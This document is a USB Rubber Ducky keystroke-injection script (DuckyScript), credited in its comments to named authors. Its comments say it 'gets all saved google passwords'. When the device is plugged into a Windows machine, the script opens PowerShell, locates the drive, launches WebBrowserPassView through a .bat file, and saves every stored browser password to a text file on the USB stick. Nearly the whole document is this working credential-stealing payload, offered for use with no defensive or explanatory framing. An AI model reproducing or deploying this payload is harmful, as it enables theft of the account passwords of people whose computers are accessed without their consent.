REM Made By Rams3sth3s3c0nd (fixed by kyoceti)
REM "what does it do?" gets all saved google passwords
REM you WILL need twinduck
REM you need WebPassView and a .bat file (rename it "OpenPass") with in it the text: start WebBrowserPassView.exe
REM opens powershell
DELAY 1000
GUI r
DELAY 100
STRING powershell
DELAY 50
ENTER
DELAY 2000
REM ********
REM navigates to USB drive usb is called DUCKY for me
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name
DELAY 50
ENTER
DELAY 50
STRING cd $usbPath.name
DELAY 50
ENTER
DELAY 50
REM *****************
REM opens the .bat script
STRING ./OpenPass.bat
DELAY 2000
REM ******************************
REM saves the passwords in txt file
CTRL A
DELAY 50
CTRL S
DELAY 50
F4
DELAY 50
CTRL A
DELAY 50
REM *******************************************************
REM    ↓ IMPORTANT: change the "E" to whatever your usb-drive letter is.
STRING E:\
DELAY 50
ENTER
DELAY 50
ENTER
DELAY 50
ENTER
DELAY 50
STRING PASSWORD
DELAY 50
ENTER
DELAY 1000
ALT F4
DELAY 500
STRING exit
DELAY 50
ENTER
REM **************************************
REM now check in the usb folder and you will see a .txt folder with all the logged passwords
